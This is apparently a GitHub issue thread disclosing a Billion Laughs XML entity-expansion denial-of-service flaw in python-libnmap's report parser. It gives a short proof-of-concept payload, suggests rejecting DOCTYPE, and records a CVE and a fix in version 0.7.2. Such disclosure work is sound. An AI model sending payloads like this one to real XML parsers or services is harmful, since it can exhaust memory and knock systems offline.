XML Injection DoS attack

[prodigysml]

Issue

Libnmap is vulnerable to XML Bomb attacks using the following:
https://en.wikipedia.org/wiki/Billion_laughs_attack

Where the Issue Occurred

The issue occurs within parsing of XML reports for nmap. The exact line where the vulnerable parsing occurs is given below:

python-libnmap/libnmap/parser.py

Line 90 in 9cf3a54

root = ET.fromstring(nmap_data)

Reproduction steps

Run the following code:

ty = NmapParser()

payload = """
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz><hello>&lol3;</hello></lolz>
"""

ty.parse(payload)

Remediation

Python does not contain any fixes for this vulnerability, but that doesn't mean it can't be fixed. Searching for the word DOCTYPE, prior to parsing, and raising an exception should patch the issue.

[carnil]

This apparently was assigned CVE-2019-1010017.

[cooperlees]

It seems there has been somework on XML bomb attacks in the past. Maybe it's best to update here and get it fixed?
https://bugs.python.org/issue17239

[huntr-helper]

Please refer to #101 for a suggested fix.

[savon-noir]

will be fixed by PR #107 as soon as travis wakes up

[savon-noir]

fixed by new release v0.7.2.

Package is also available in pip:

ronald@brouette:~/dev$ pip3 install python-libnmap==0.7.2
Collecting python-libnmap==0.7.2
  Downloading python-libnmap-0.7.2.tar.gz (36 kB)
...
...
Successfully installed python-libnmap-0.7.2
ronald@brouette:~/dev$